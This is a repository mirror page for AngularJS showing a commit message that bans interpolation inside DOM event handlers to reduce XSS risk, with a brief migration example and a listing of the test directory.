mirror of
https://github.com/Hopiu/angular.js.git
synced 2026-03-17 07:40:22 +00:00
39841f2ec9
BREAKING CHANGE: Interpolations inside DOM event handlers are
disallowed. DOM event handlers execute arbitrary Javascript code.
Using an interpolation for such handlers means that the interpolated
value is a JS string that is evaluated. Storing or generating such
strings is error prone and likely leads to an XSS if you're not
super careful. On the other hand, ng-click and such event handlers
evaluate Angular expressions that are a lot safer (e.g. No direct
access to global objects - only scope), cleaner and harder to
exploit.
To migrate the code follow the example below:
Before:
JS: scope.foo = 'alert(1)';
HTML: <div onclick="{{foo}}">
After:
JS: scope.foo = function() { alert(1); }
HTML: <div ng-click="foo()">
|
||
|---|---|---|
| .. | ||
| auto | ||
| ng | ||
| ngCookies | ||
| ngMobile | ||
| ngMock | ||
| ngResource | ||
| ngRoute | ||
| ngSanitize | ||
| ngScenario | ||
| AngularSpec.js | ||
| ApiSpecs.js | ||
| BinderSpec.js | ||
| jqLiteSpec.js | ||
| jquery_alias.js | ||
| jquery_remove.js | ||
| jQueryPatchSpec.js | ||
| loaderSpec.js | ||
| matchers.js | ||
| minErrSpec.js | ||
| testabilityPatch.js | ||